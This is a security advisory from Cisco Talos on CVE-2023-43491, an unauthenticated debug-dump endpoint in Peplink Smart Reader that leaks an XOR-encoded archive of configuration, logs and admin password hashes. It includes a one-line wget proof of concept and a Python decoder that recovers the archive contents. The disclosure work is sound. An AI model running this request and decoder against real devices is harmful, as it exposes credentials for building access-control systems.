Talos Vulnerability Report

TALOS-2023-1863

Peplink Smart Reader web interface /cgi-bin/debug_dump.cgi information disclosure vulnerability

April 17, 2024
CVE Number

CVE-2023-43491

SUMMARY

An information disclosure vulnerability exists in the web interface /cgi-bin/debug_dump.cgi functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Peplink Smart Reader v1.2.0 (in QEMU)

PRODUCT URLS

Smart Reader - https://www.peplinkworks.com/Smart-Reader.asp

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-284 - Improper Access Control

DETAILS

The Peplink Smart Reader is the access-control hardware associated with the PepXIM Time-Logging and Security System. It is used to manage access to buildings, workstations and public transit, as well as for employee time management.

The Peplink Smart Reader exposes a web server on port 443 intended for local configuration and control of the card reader. This web server exposes an unauthenticated endpoint at /cgi-bin/debug_dump.cgi. This appears to be used when Peplink support needs more significant diagnostic information to troubleshoot an issue and the device is in a situation where the ‘REMOTE_ASSISTANCE’ functionality is not feasible. This endpoint is handled by a standalone shell script located at /web/cgi-bin/debug_dump.cgi, which does not implement any form of authentication.

The shell script first runs a series of diagnostic commands (their output is collected under /tmp/debug.dump), then executes a final tar command that archives that diagnostic output together with the specific files and directories listed in the command below.

(tar cf - /etc/software-release \
          /etc/build \
          /etc/build_timestamp \
          /etc/wifi*[._]* \
          /etc/ap*[._]* \
          /etc/wapi*[._]* \
          /etc/portal_* \
          /etc/model \
          /etc/*product* \
          /etc/hardware* \
          /etc/hw_ver \
          /etc/variant \
          /etc/masterconfig* \
          /etc/last_reboot_reason \
          /etc/resolv.conf \
          /etc/icclient.cfg \
          /etc/net/* \
          /etc/mac/* \
          /etc/ppp/* \
          /etc/cwmp/* \
          /etc/hostapd* \
          /etc/nfc.conf \
          /var/log/submit_cloud.log* \
          /var/log/message* \
          /var/log/vpn_daemon.log* \
          /var/log/vpn/* \
          /var/log/nfc-*.log \
          /var/run/* \
          /var/spool/* \
          /tmp/debug.dump/* \
          |gzip - -c 2> /dev/null | xor)

Lastly, the tar stream is gzip compressed and piped through a binary named xor, which is responsible for enciphering the archive. This binary implements a byte-by-byte XOR encoding: every byte of the gzip stream is XOR'd with the constant 0x32. Because XOR with a fixed byte is its own inverse, the same operation recovers the original archive.

An unauthenticated attacker who submits an HTTP request to the /cgi-bin/debug_dump.cgi endpoint can decode, decompress and unarchive the file, granting them access to significant information about the device, including sensitive information such as the administrative user’s username and MD5 password hash.
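The decoding steps described above (XOR with 0x32, gunzip, untar) can be reversed in a few lines. The following is an added example written for this page, not Talos' or Peplink's code; it assumes only what the advisory states (single-byte XOR key 0x32 applied to a gzip'd tar stream) and builds a constructed stand-in for the device output so that it runs offline. The gzip magic bytes 1f 8b become 2d b9 after XOR with 0x32, which gives a quick way to confirm the response is the XOR'd archive before decompressing it.

```python
import gzip
import io
import tarfile

XOR_KEY = 0x32            # per the advisory: every byte is XOR'd with 0x32
GZIP_MAGIC = b"\x1f\x8b"  # gzip header; after XOR with 0x32 it reads 2d b9


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Byte-wise XOR with a constant; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def looks_like_xored_gzip(data: bytes, key: int = XOR_KEY) -> bool:
    """Sanity check: un-XORing the first two bytes should yield the gzip magic."""
    return xor_bytes(data[:2], key) == GZIP_MAGIC


def decode_debug_dump(blob: bytes, key: int = XOR_KEY) -> dict:
    """Reverse the CGI script's pipeline: XOR -> gunzip -> untar.

    Returns {member_name: contents} for every regular file in the archive.
    Raises ValueError if the blob does not look like an XOR'd gzip stream.
    """
    if not looks_like_xored_gzip(blob, key):
        raise ValueError("input does not decode to a gzip stream with this key")
    tar_bytes = gzip.decompress(xor_bytes(blob, key))
    members = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
        for m in tf.getmembers():
            if m.isfile():
                members[m.name] = tf.extractfile(m).read()
    return members


def build_sample_dump(files: dict, key: int = XOR_KEY) -> bytes:
    """Constructed stand-in for the device response: tar -> gzip -> XOR.

    Same order as the debug_dump.cgi pipeline; used here only so the example
    can run without a device.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return xor_bytes(gzip.compress(buf.getvalue()), key)


# Constructed sample members; names mirror two paths from the tar command
# (tar strips the leading "/"). Contents are made up for this example.
SAMPLE_FILES = {
    "etc/software-release": b"1.2.0\n",
    "etc/model": b"Smart Reader\n",
}


if __name__ == "__main__":
    # Offline round trip; replace with open("debug_dump.cgi", "rb").read()
    # on the file saved by the wget command to decode a real response.
    blob = build_sample_dump(SAMPLE_FILES)
    print("first bytes:", blob[:2].hex())       # 2db9, i.e. 1f8b ^ 0x32
    for name, content in decode_debug_dump(blob).items():
        print(name, content)
```

To decode a real capture, pass the bytes wget saved to decode_debug_dump and grep the returned members (for example the /etc/masterconfig* entries) for the credential material the advisory describes. The magic-byte check also doubles as a cheap detection heuristic for the XOR'd archive leaving the device over HTTPS if traffic is inspected at a TLS-terminating proxy.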

Exploit Proof of Concept

wget --no-check-certificate https://${TARGET}/cgi-bin/debug_dump.cgi

VENDOR RESPONSE

The vendor links to new firmware versions at the end of their advisory: https://forum.peplink.com/t/peplink-security-advisory-smart-reader-firmware-1-2-0-cve-2023-43491-cve-2023-45209-cve-2023-39367-cve-2023-45744-cve-2023-40146/47256

TIMELINE

2023-11-30 - Vendor Disclosure
2024-04-17 - Vendor Patch Release
2024-04-17 - Public Release

Credit

Discovered by Matt Wiseman of Cisco Talos.